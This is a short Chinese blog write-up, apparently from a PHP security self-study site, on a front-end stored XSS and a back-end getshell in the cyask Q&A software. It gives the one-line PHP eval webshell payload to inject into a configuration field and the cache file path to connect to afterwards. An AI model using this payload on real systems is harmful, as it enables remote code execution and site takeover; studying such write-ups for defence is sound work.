cyask 前台xss与后台Getshell – 网站安全 – 自学php

时间: 2020-10-10|tag: 20次围观|0 条评论

 首先是注册一枚

cyask 前台xss与后台Getshell – 网站安全 – 自学php插图
然后查看会员资料,发现xss已经成功的触发了
cyask 前台xss与后台Getshell – 网站安全 – 自学php插图1

cyask 前台xss与后台Getshell – 网站安全 – 自学php插图2
关于后台拿shell,在配置文件出插入

 ';eval($_POST[c]);//

经过检查,只能插入四处
cyask 前台xss与后台Getshell – 网站安全 – 自学php插图3
插入后连接
askdata\cache\cache_variable.php
    上一篇: XSS BYPASS WAF小记 - 网站安全 - 自学php

    下一篇: 应急响应中web后门排查与高效分析web日志技巧
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《cyask 前台xss与后台Getshell – 网站安全 – 自学php
   

还没有人抢沙发呢~